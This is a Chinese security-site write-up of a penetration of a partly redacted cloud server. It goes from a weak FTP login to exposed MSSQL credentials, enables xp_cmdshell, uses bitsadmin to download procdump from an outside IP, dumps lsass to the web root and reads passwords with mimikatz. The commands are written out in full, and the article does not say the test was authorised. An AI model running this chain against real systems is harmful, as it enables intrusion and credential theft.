freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

ftp引发的一次渗透实战
2019-08-07 07:52:50

信息收集

IP为阿里云118.19.xx.xx、开放大量端口21,22,80,81,1433,3389,8888等等

ftp弱口令

指纹识别发现81端口为serv-u软件。一个弱口令ftp/ftp直接登录。原以为ftp用来传输文件作用不大,没想到无意中翻找到了web.config的敏感文件。


image.png


打开很明显看到sql server的配置信息。


image.png

mssql命令执行

开启xp_cmdshell组件


exec sp_configure 'show advanced options',1;reconfigure;

exec sp_configure 'xp_cmdshell',1;reconfigure;


直接执行系统命令


exec master.dbo.xp_cmdshell  'whoami';


image.png


因为阿里云服务器的原因,想着直接激活guest用户,结果在添加到管理员组的时候并没有成功。查看进程,发现存在防护aliyundun.exe

image.png


那采用prodump导出lsass.dmp,然后从web下载到本地,再使用mimikatz读取密码。

此时有一个问题,web的绝对路径还不知道。

web路径查找

该IP的8888端口正常运行着web服务,为一login.aspx登录地址。

dir搜索logon.aspx


exec master.dbo.xp_cmdshell  'cd /d E: && dir /b /s Logon.aspx'


image.png



找到网站绝对路径,就简单啦~

dump  hash

从公网上下载prodump.exe下载到靶机上。


exec master.dbo.xp_cmdshell  'bitsadmin /transfer myDownLoadJob /download /priority normal "http://144.34.xxx.xxx/procdump64.exe" "C:\\Windows\\system32\\procdump.exe"'


procdump.exe -accepteula -ma lsass.exe lsass.dmp

导出lsass.dmp


image.png


再copy lsass.dmp到网站根目录下。需要重命名为txt后缀名。


exec master.dbo.xp_cmdshell  'copy lsass.dmp "E:\Program Files\DESS.Web\tmp.txt"'


需要注意的是:

因为windows文件夹名称中间没有空格,如果文件夹名(或者目录名)中有空格,就必须加双引号了

访问tmp.txt下载。然后本地的mimikatz读取即可。


image.png

总结

不要放过任何一个细节。而且这次成功渗透,发现全程以静默化状态运行,没有挂马,没有恶意扫描。


关注我们

Tide安全团队正式成立于2019年1月,是以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。

想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.net 或关注公众号:

ewm.png


# mssql渗透 # Getshell
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者